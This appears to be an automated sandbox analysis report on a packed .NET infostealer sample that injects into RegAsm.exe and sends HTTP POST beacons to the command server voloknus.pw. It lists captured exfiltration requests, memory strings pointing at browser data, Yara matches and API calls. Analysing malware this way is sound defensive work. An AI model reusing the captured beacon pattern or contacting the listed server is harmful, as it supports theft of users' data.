Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 533Host: voloknus.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 1276Host: voloknus.pw

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: TT4ybwWc1T.exe, 00000000.00000002.1363330210.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/(
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/)
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/2nekt9Tpzu4t9UGz
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/E(
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/P-
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/S
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1851207735.000000000825E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/api
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/api-
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/api3
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/api4
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/api6wuOtdB
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apiMpU5lT
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apiS
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apiSuH/iWh
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apiV
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apiX
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apib
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apie
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apif3h5zg
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw/apigwlhGzn
Source: RegAsm.exe, 00000002.00000002.1781462307.0000000003981000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw:80/api
Source: RegAsm.exe, 00000002.00000002.1781462307.0000000003981000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://voloknus.pw:80/api-
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Aspose.Total.NET.lic	String found in binary or memory: https://purchase.aspose.com/policies/use-license
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 8Host: voloknus.pw

Source: unknown

DNS traffic detected: queries for: voloknus.pw

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00442580 InternetQueryDataAvailable,HttpOpenRequestW,GetModuleHandleW,InternetCloseHandle,InternetOpenW,GetProcAddress,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetReadFile,InternetQueryDataAvailable,HttpSendRequestA,GetProcAddress,HttpAddRequestHeadersA,

2_2_00442580

System Summary

Malicious sample detected (through community Yara rule)

Source: TT4ybwWc1T.exe, type: SAMPLE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.0.TT4ybwWc1T.exe.460000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen

Source: TT4ybwWc1T.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: TT4ybwWc1T.exe, type: SAMPLE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.0.TT4ybwWc1T.exe.460000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C90B6B0	0_2_6C90B6B0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C95AC29	0_2_6C95AC29
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C902D70	0_2_6C902D70
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C934EE0	0_2_6C934EE0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C924970	0_2_6C924970
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C924AC0	0_2_6C924AC0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C950B89	0_2_6C950B89
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C8E8B30	0_2_6C8E8B30
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C924550	0_2_6C924550
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C95A54D	0_2_6C95A54D
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C8E6650	0_2_6C8E6650
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C8EC7B0	0_2_6C8EC7B0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C8EA7E0	0_2_6C8EA7E0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C8FA0C0	0_2_6C8FA0C0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C9363B0	0_2_6C9363B0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C942310	0_2_6C942310
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C923C90	0_2_6C923C90
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C941CA0	0_2_6C941CA0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C935DD0	0_2_6C935DD0
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C955DD2	0_2_6C955DD2
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C935EB9	0_2_6C935EB9
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C923E50	0_2_6C923E50
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C95BFF1	0_2_6C95BFF1
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C959FFC	0_2_6C959FFC
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C9358D7	0_2_6C9358D7
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C9358D5	0_2_6C9358D5
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C935830	0_2_6C935830
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C95B964	0_2_6C95B964
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C959AAB	0_2_6C959AAB
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C923460	0_2_6C923460
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C935050	0_2_6C935050
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C935274	0_2_6C935274
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C923260	0_2_6C923260
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_02ACC290	0_2_02ACC290
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_02AC0988	0_2_02AC0988
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_02AC0979	0_2_02AC0979
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_02ACA600	0_2_02ACA600
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_074E26F8	0_2_074E26F8
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_074E0EB3	0_2_074E0EB3
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_074E0930	0_2_074E0930
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_074E26DC	0_2_074E26DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004242C6	2_2_004242C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004042DF	2_2_004042DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043746E	2_2_0043746E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043C4B4	2_2_0043C4B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042051C	2_2_0042051C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00442580	2_2_00442580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D66C	2_2_0040D66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A670	2_2_0040A670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042A744	2_2_0042A744
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411717	2_2_00411717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00427848	2_2_00427848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00422859	2_2_00422859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040E8E7	2_2_0040E8E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00405930	2_2_00405930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042998E	2_2_0042998E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408B90	2_2_00408B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00403BAB	2_2_00403BAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00437CF4	2_2_00437CF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042BDAC	2_2_0042BDAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043AEF8	2_2_0043AEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004190F6	2_2_004190F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042508A	2_2_0042508A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B09F	2_2_0040B09F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044711F	2_2_0044711F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C212	2_2_0040C212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004462C3	2_2_004462C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A291	2_2_0041A291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0045329B	2_2_0045329B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D381	2_2_0041D381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044F42F	2_2_0044F42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004164E2	2_2_004164E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004454F4	2_2_004454F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B4B6	2_2_0041B4B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00449550	2_2_00449550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004135C0	2_2_004135C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0045F5B4	2_2_0045F5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C5B8	2_2_0041C5B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417602	2_2_00417602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00468610	2_2_00468610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041974F	2_2_0041974F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0046D778	2_2_0046D778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00452940	2_2_00452940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E95E	2_2_0041E95E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044D9D4	2_2_0044D9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416B4E	2_2_00416B4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00447B74	2_2_00447B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00428B26	2_2_00428B26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC08	2_2_0041AC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00438D74	2_2_00438D74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044CD14	2_2_0044CD14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00466D2E	2_2_00466D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00414DFA	2_2_00414DFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00414E31	2_2_00414E31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00425F24	2_2_00425F24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044FFF3	2_2_0044FFF3

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: String function: 6C949B35 appears 141 times
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: String function: 6C94D520 appears 31 times
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: String function: 6C9490D8 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00448E10 appears 47 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040E2FD NtClose,NtReadFile,	2_2_0040E2FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D66C NtCreateFile,lstrlenW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,	2_2_0040D66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040E8E7 lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrlenW,lstrlenW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcmpW,NtClose,lstrcmpW,lstrcatW,lstrcmpW,NtCreateFile,NtQueryDirectoryFile,lstrcmpW,	2_2_0040E8E7

Source: TT4ybwWc1T.exe, 00000000.00000002.1375458555.00000000062B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1375458555.0000000006124000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1383913333.0000000007230000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1383639824.0000000007131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1363330210.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1380457210.00000000070C8000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWindowsApp1.dll8 vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000000.1350619281.0000000000862000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesensible_and_easy_to_assist.exeX vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe, 00000000.00000002.1361960506.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TT4ybwWc1T.exe
Source: TT4ybwWc1T.exe	Binary or memory string: OriginalFilenamesensible_and_easy_to_assist.exeX vs TT4ybwWc1T.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: TT4ybwWc1T.exe	ReversingLabs: Detection: 52%
Source: TT4ybwWc1T.exe	Virustotal: Detection: 65%

Source: TT4ybwWc1T.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TT4ybwWc1T.exe C:\Users\user\Desktop\TT4ybwWc1T.exe
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT4ybwWc1T.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@3/2@1/1

Source: TT4ybwWc1T.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00408B90 GetProcAddress,Process32NextW,GetProcAddress,GetModuleHandleW,Process32FirstW,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetProcAddress,GetProcAddress,FindCloseChangeNotification,

2_2_00408B90

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: TT4ybwWc1T.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: TT4ybwWc1T.exe

Static file information: File size 4340736 > 1048576

Source: TT4ybwWc1T.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TT4ybwWc1T.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3fe200

Source: TT4ybwWc1T.exe

